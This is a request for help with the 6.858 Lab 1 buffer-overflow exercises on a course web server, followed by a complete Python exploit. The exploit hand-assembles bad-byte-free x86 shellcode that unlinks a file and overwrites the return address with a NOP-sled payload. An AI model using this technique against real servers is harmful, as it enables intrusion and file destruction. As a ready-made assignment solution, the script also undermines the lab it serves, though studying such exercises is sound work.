Programming language: Python
Category: for study

Help with completing assignment 6.858 Lab 1

Exercise 2. Pick two buffer overflows out of what you have found for later exercises (although you can change your mind later, if you find your choices are particularly difficult to exploit). The first must overwrite a return address on the stack, and the second must overwrite some other data structure that you will use to take over the control flow of the program. Write exploits that trigger them. You do not need to inject code or do anything other than corrupt memory past the end of the buffer, at this point. Verify that your exploit actually corrupts memory, by either checking the last few lines of dmesg | tail, using gdb, or observing that the web server crashes.

Provide the code for the exploits in files called exploit-2a.py and exploit-2b.py, and indicate in answers.txt which buffer overflow each exploit triggers. If you believe some of the vulnerabilities you have identified in Exercise 1 cannot be exploited, choose a different vulnerability.

Exercise 3. Starting from one of your exploits from Exercise 2, construct an exploit that hijacks control flow of the web server and unlinks /home/httpd/grades.txt. Save this exploit in a file called exploit-3.py. Explain in answers.txt whether or not the other buffer overflow vulnerabilities you found in Exercise 1 can be exploited in this manner. Verify that your exploit works; you will need to re-create /home/httpd/grades.txt after each successful exploit run.

Suggestion: first focus on obtaining control of the program counter. Sketch out the stack layout that you expect the program to have at the point when you overflow the buffer, and use gdb to verify that your overflow data ends up where you expect it to. Step through the execution of the function to the return instruction to make sure you can control what address the program returns to. The next, stepi, info reg, and disassemble commands in gdb should prove helpful.

Once you can reliably hijack the control flow of the program, find a suitable address that will contain the code you want to execute, and focus on placing the correct code at that address, for example a derivative of Aleph One's shellcode.

Note: SYS_unlink, the number of the unlink syscall, is 10, or '\n' (newline). Why does this complicate matters? How can you get around it?
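As an added example (not code from the lab handout, and not from the person posting this request), the following Python sketch shows the two things Exercise 3 hinges on: producing the syscall number 10 and the path's terminating NUL at runtime, so that neither 0x0a nor 0x00 appears in the bytes sent to the server, and checking the whole payload for those bytes before it is sent. It assumes a 32-bit x86 Linux target, where unlink is syscall 10 and exit is syscall 1. RET_OFFSET, BUF_ADDR and the placement of the payload in the GET line in build_request are hypothetical placeholders; replace them with what gdb shows for the overflow you picked.

```python
import struct

# Assumed target facts, for illustration only (not stated in the lab text):
# a 32-bit x86 Linux build of the server, where SYS_unlink = 10 and SYS_exit = 1.
SYS_UNLINK = 10

# Bytes the request must not contain: 0x0a ends the line the server reads,
# and 0x00 ends the C string the server copies. Either one truncates the payload.
BAD_BYTES = frozenset({0x00, 0x0a})

# Hypothetical stack layout; replace with what gdb shows for your overflow.
RET_OFFSET = 1024        # bytes from the start of the overflowed buffer to the saved EIP
BUF_ADDR = 0xBFFFD000    # address of that buffer (info reg / x/wx $esp in gdb)


def find_bad_bytes(data, bad=BAD_BYTES):
    """Return [(index, byte), ...] for every forbidden byte in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def unlink_shellcode(path=b"/home/httpd/grades.txt"):
    """Hand-assembled 32-bit x86 Linux shellcode: unlink(path); exit(0).

    The jmp/call pair leaves the address of the inline path on the stack
    (Aleph One's trick), so no absolute address is needed. The NUL that
    terminates the path and the syscall number 10 are both produced at
    runtime instead of being stored as bytes in the code.
    """
    disp = len(path)     # offset of the terminator slot from the string start
    if find_bad_bytes(path) or disp in BAD_BYTES or disp > 127:
        raise ValueError("path, or its length as a disp8, would put a forbidden byte in the code")
    body = b"".join([
        b"\x5b",                            # pop  ebx            ; ebx = &path (pushed by call)
        b"\x31\xc0",                        # xor  eax, eax       ; eax = 0 with no NUL in the code
        b"\x88\x43" + bytes([disp]),        # mov  [ebx+disp], al ; write the terminating NUL
        b"\xb0" + bytes([SYS_UNLINK + 1]),  # mov  al, 11
        b"\x48",                            # dec  eax            ; eax = 10 without a literal 0x0a
        b"\xcd\x80",                        # int  0x80           ; unlink(ebx)
        b"\x31\xc0",                        # xor  eax, eax
        b"\x40",                            # inc  eax            ; eax = 1 = SYS_exit
        b"\x31\xdb",                        # xor  ebx, ebx       ; status 0
        b"\xcd\x80",                        # int  0x80           ; exit(0)
    ])
    jmp = b"\xeb" + bytes([len(body)])                    # jmp short to the call below
    call = b"\xe8" + struct.pack("<i", -(len(body) + 5))  # call back to the pop ebx
    code = jmp + body + call + path + b"X"                # 'X' is the slot the NUL overwrites
    if find_bad_bytes(code):
        raise AssertionError("shellcode contains a forbidden byte")
    return code


def build_payload(shellcode, ret_offset=RET_OFFSET, buf_addr=BUF_ADDR, sled_len=256):
    """Lay out [NOP sled][shellcode][filler][saved EIP -> middle of the sled].

    Returning into the middle of the sled tolerates a small error in
    buf_addr, for example from environment differences between gdb and
    the server started normally.
    """
    if sled_len + len(shellcode) > ret_offset:
        raise ValueError("sled + shellcode do not fit before the saved return address")
    sled = b"\x90" * sled_len
    filler = b"A" * (ret_offset - sled_len - len(shellcode))
    ret = struct.pack("<I", buf_addr + sled_len // 2)
    payload = sled + shellcode + filler + ret
    bad = find_bad_bytes(payload)
    if bad:
        raise ValueError("forbidden bytes at %r; change buf_addr or the layout" % bad)
    return payload


def build_request(payload):
    """Hypothetical request shape: assumes the chosen overflow is reached
    through the request target. Which field overflows depends on the bug
    picked in Exercise 1, so adapt this to yours."""
    return b"GET /" + payload + b" HTTP/1.0\r\n\r\n"


if __name__ == "__main__":
    sc = unlink_shellcode()
    req = build_request(build_payload(sc))
    print("shellcode: %d bytes, request: %d bytes" % (len(sc), len(req)))
    print(sc.hex())
```

The reason the newline matters is the same reason the NUL matters: if the server reads the request a line at a time, a 0x0a byte inside the shellcode ends the line and everything after it never reaches the buffer, and a 0x00 stops any C string copy. The code above therefore never stores those values; it zeroes a register with xor, derives 10 as 11 minus 1, and writes the string terminator with a mov at runtime. Run find_bad_bytes over the final request rather than only over the shellcode, since the return address and any filler can introduce the same bytes.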